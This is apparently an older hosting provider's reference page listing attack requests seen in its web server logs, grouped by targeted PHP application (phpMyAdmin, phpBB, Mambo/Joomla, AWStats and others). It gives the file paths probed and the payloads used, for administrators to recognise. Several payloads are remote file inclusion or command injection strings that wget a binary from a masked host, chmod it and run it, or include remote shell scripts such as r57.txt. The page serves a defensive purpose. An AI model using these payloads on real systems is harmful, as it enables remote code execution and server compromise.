System: WWW Hacker Activity
At any given time there are thousands of computers sending out requests designed to compromise a web server or website by exploiting vulnerabilities in various software packages and programming languages. This comes on top of brute-force ssh attacks and other non-HTTP techniques.
The difference between now and earlier years is that many of these computers have actually been compromised themselves and turned into 'zombie' servers controlled by yet another server and so on. The 'controller' of a zombie network may receive notification when a server has been compromised, or the system could be completely automated and designed simply to spread as far as possible.
The following entries will give you an idea of what kind of exploits are about and what to look for in your webserver logs. If you're not running the targeted software packages then you (probably) don't need to be too concerned. You may still want to use mod_rewrite to send a 403 Forbidden or similar response, but that would just be to reduce bandwidth.
If you are running one more more of these packages then make sure you keep up to date with upgrades and patches. Where possible we've included a link to the product homepage and/or security announcements.
Note: This list is by no means comprehensive and should be used for information purposes only.
PHPMyAdmin
- Target
- PHPMyAdmin
- Files Requested
- /PMA/main.php
/admin/main.php
/admin/mysql/main.php
/admin/phpmyadmin/main.php
/admin/pma/main.php
/db/main.php
/dbadmin/main.php
/main.php
/myadmin/main.php
/mysql-admin/main.php
/mysql/main.php
/mysqladmin/main.php
/phpMyAdmin-2.2.3/main.php
/phpMyAdmin-2.2.6/main.php
/phpMyAdmin-2.5.1/main.php
/phpMyAdmin-2.5.4/main.php
/phpMyAdmin-2.5.6/main.php
/phpmyadmin/main.php
/phpmyadmin2/main.php
/web/phpMyAdmin/main.php
/PMA/read_dump.php
/db/read_dump.php
/dbadmin/read_dump.phpv /myadmin/read_dump.php
/mysql/read_dump.php
/mysqladmin/read_dump.php
/phpMyAdmin%202.6.4-pl4/read_dump.php
/phpMyAdmin%202.7.0-beta1/read_dump.php
/phpMyAdmin%202.7.0-pl1/read_dump.php
/phpMyAdmin%202.7.0-rc1/read_dump.php
/phpMyAdmin%202.7.0/read_dump.php
/phpMyAdmin-2.2.3/read_dump.php
/phpMyAdmin-2.2.7-pl1/read_dump.php
/phpMyAdmin-2.5.6/read_dump.php
/phpMyAdmin-2.5.7-pl1/read_dump.php
/phpMyAdmin-2.6.0-pl3/read_dump.php
/phpMyAdmin-2.6.0/read_dump.php
/phpMyAdmin-2.6.1-pl3/read_dump.php
/phpMyAdmin-2.6.3-pl1/read_dump.php
/phpMyAdmin-2.6.4/read_dump.php
/phpadmin/read_dump.php
/phpmyadmin/read_dump.php
/phpmyadmin1/read_dump.php
/phpmyadmin2/read_dump.php
/typo3/phpmyadmin/read_dump.php
/web/phpMyAdmin/read_dump.php
/xampp/phpmyadmin/read_dump.php
- Payload
- None - there's probably a followup scan/attack
- Security
- https://www.phpmyadmin.net/home_page/security.php
Various PHP applications
- Target
- Various PHP applications - seems to be an extension of Mambo exploit below, but with more target files
- Files Requested
- /DE/index2.php
/FR/index2.php
/NL/index2.php
/US/index2.php
/cms/index.php
/cms/index2.php
/cvs/index.php
/cvs/index2.php
/index.php
/index2.php
/mambo/index.php
/mambo/index2.php
/mb/index.php
/mb/index2.php
/site/index2.php
/v1/index2.php
/v2/index2.php
/v3/index2.php - Payload
- POST data
phpBB
- Target
- phpBB
- Files Requested
- /modules/Forums/admin/admin_styles.php
/Forums/admin/admin_styles.php
/includes/functions.php
/includes/functions_nomoketos_rules.php
/modules/Forums/admin/admin_mass_email.php
/modules/Forums/admin/index.php - Payload
- phpbb_root_path=http://XXX.XXX.XX.XX/cmd.dat?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| - Security
- https://www.phpbb.com/security/
Coppermine
- Target
- Coppermine
- Files Requested
- /modules/coppermine/themes/default/theme.php
- Payload
- THEME_DIR=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|
Mambo/Joomla Content Management System
- Target
- Mambo Content Management System
Joomla Content Management System - Files Requested
-
/index.php
/index2.php
/mambo/index2.php
/cvs/index2.php
/cvs/mambo/index2.php
/php/mambo/index2.php
/cbcms/mod_cbsms_messages.php
/components/com_extcalendar/admin_events.php
/components/com_forum/download.php
/components/com_galleria/galleria.html.php
/components/com_hashcash/server.php
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/components/com_loudmounth/includes/abbc/abbc.class.php
/components/com_pcchess/include.pcchess.php
/components/com_pccookbook/pccookbook.php
/components/com_performs/performs.php
/components/com_pollxt/conf.pollxt.php
/components/com_rsgallery2/rsgallery.html.php
/components/com_smf/smf.php
/components/com_simpleboard/file_upload.php
/components/com_sitemap/sitemap.xml.php
/components/com_videodb/core/videodb.class.xml.php
/mod_cbsms_messages.php - Payload
- _REQUEST[option]=com_content
_REQUEST[Itemid]=1
GLOBALS=
mosConfig_absolute_path=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
CONFIG_EXT[LANGUAGES_DIR]=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id - Security
- http://forum.mamboserver.com/forumdisplay.php?f=216
Wordpress, Drupal and other PHP applications
- Target
- Files Requested
- /blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php - Payload
- POST data
- Security
- https://www.php.net/
AWStats
- Target
- AWStats
- Files Requested
- /awstats/awstats.pl
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl - Payload
- configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20XXX%2eXXX%2eXX%2eXX%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
- Security
- https://awstats.sourceforge.io/awstats_security_news.php
Microsoft Applications/Extensions
- Target
- Microsoft Applications/Extensions (may be benign)
- Files Requested
- /5c/_vti_bin/owssvr.dll
/5c/MSOffice/cltreq.asp - Payload
- UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
Note: The following exploits were ALL attempted on various sites on our server from the same IP address on 29 March 2007 with the User Agent "Morfeus Fucking Scanner" which seems to be some kind of high-powered PHP exploiting robot.
DBImageGallery
- Target
- DBImageGallery
- Files Requested
-
/admin/attributes.php
/admin/images.php
/admin/scan.php
/includes/attributes.php
/includes/db_utils.php
/includes/images.php
/includes/utils.php
/includes/values.php - Payload
- donsimg_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
- Security
- https://www.dbscripts.net/imagegallery/history.php
DBGuestbook
- Target
- DBGuestbook
- Files Requested
- /includes/guestbook.php
/includes/utils.php
/includes/views.php - Payload
- dbs_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Ultimate Fun Book
- Target
- Ultimate Fun Book
- Files Requested
- /board//function.php
/funboard/function.php
/function.php - Payload
- gbpfad=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Back-End.org CMS
- Target
- Back-End.org CMS
- Files Requested
- /BE_config.php
- Payload
- _PSL[classdir]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Sinapis Forum CMS
- Target
- Sinapis Forum CMS
- Files Requested
- /sinapis.php
/forum//sinapis.php
/FO/sinapis.php - Payload
- fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
- Security
Admin Phorum
- Target
- PhpForums Admin Phorum
- Files Requested
- /actions/del.php
- Payload
- include_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
eFiction
- Target
- eFiction
- Files Requested
- /bridges/SMF/logout.php
/get_session_vars.php - Payload
- path_to_smf=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
PMB Services
- Target
- PMB Services
- Files Requested
- /cnl_prod/pmb/opac_css/includes/resa_func.inc.php
/pmb/opac_css/includes/resa_func.inc.php
/opac_css/includes/resa_func.inc.php - Payload
- class_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
AgerMenu
- Target
- AgerMenu
- Files Requested
- /example/inc/top.inc.php
- Payload
- rootdir=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Fast Click
- Target
- Fast Click
- Files Requested
- /fclick/show.php
- Payload
- path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
FCRing
- Target
- FCRing
- Files Requested
- /fcring.php
- Payload
- s_fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
PHP-MIP
- Target
- PHP-MIP
- Files Requested
- /php/top.php
/phpmip//top.php
/top.php - Payload
- laypath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
SendStudio
- Target
- SendStudio
- Files Requested
- /sendstudio/admin/includes/createemails.inc.php
/sendstudio/admin/includes/send_emails.inc.php - Payload
- ROOTDIR=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Not Yet Classified
/forum/index.php?func=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /index.php?func=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /index.php?page=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /live/help.php?css_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /modules/My_eGallery/public/displayCategory.php?adminpath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /phorum/common.php?db_file=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /skins/advanced/advanced1.php?pluginpath[0]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /ubbthreads/addpost_newpoll.php?addpoll=preview&thispath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/Note: The following exploits were attempted by user agent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) - from Russia with love.
/components/com_simpleboard/file_upload.php?sbp=http://XXXXXX.ru/r57.txt? /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt? /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt? /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt? /modules/MambWeather/Savant2/main.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt? /components/com_joomlaboard/file_upload.php?sbp=http://XXXXXX.ru/r57.txt?